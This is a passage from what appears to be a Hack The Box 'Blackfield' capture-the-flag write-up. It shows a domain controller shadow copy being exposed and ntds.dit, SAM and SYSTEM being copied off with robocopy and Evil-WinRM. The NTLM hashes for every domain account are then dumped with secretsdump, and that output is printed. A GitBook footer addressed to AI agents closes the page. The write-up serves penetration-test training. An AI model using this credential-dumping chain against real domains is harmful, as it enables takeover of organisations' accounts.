Alias VSS_SHADOW_SET for shadow set ID {84df4aca-4fc6-4aca-9885-faec3e4372c1} set as environment variable.

Querying all shadow copies with the shadow copy set ID {84df4aca-4fc6-4aca-9885-faec3e4372c1}

        * Shadow copy ID = {e8ba1acb-a843-466a-bcf6-e1688e333fba}               %pwn%
                - Shadow copy set: {84df4aca-4fc6-4aca-9885-faec3e4372c1}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 6/4/2026 12:16:40 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %pwn% z:
-> %pwn% = {e8ba1acb-a843-466a-bcf6-e1688e333fba}
The shadow copy was successfully exposed as z:\.
->

```

**Step 4 : copy the ntds.dit to temp directory using robocopy**

```powershell
*Evil-WinRM* PS C:\temp> robocopy /b z:\Windows\NTDS\ C:\temp\ ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, June 4, 2026 12:21:22 AM
   Source : z:\Windows\NTDS\
     Dest : C:\temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\Windows\NTDS\
            New File              18.0 m        ntds.dit
  0.0%
  0.3%
  0.6%
  1.0%
 <SNIP> 
100%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   18.00 m   18.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :            67168569 Bytes/sec.
   Speed :            3843.416 MegaBytes/min.
   Ended : Thursday, June 4, 2026 12:21:23 AM

*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2026  12:16 AM            605 2026-06-04_12-16-40_DC01.cab
-a----         6/3/2026  10:19 PM       18874368 ntds.dit
-a----         6/4/2026  12:01 AM          45056 SAM
-a----         6/4/2026  12:16 AM             84 shadow.txt
-a----         6/4/2026  12:01 AM       17596416 SYSTEM


```

**Step 5 : download the all the registry files to the attack machine using download option of winrm**

```powershell
*Evil-WinRM* PS C:\temp> download SAM
                                        
Info: Downloading C:\temp\SAM to SAM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp> download SYSTEM
                                        
Info: Downloading C:\temp\SYSTEM to SYSTEM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\temp> download ntds.dit
                                        
Info: Downloading C:\temp\ntds.dit to ntds.dit
                                        
Info: Download successful!
```

**Step 6 : Dump the hashes using secretsdump**

```
┌──(ajay㉿kali)-[~]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL      
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:4618f68323d224de2ca7d3143f80efe9:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD706381:1109:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD937395:1110:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD553715:1111:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD840481:1112:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD622501:1113:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD787464:1114:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
<SNIP>
....
<SNIP>
```

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1yqXAJ4qdr5C0Zc0JgOh%2Fimage.png?alt=media&amp;token=f8ab305a-cee7-439e-88f8-a7f88463c8c5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmISeDmzCJL9jW6tdXcKE%2Fimage.png?alt=media&amp;token=9f844bcf-4c8c-42fd-8152-de9ef9a7b121" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-blackfield.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
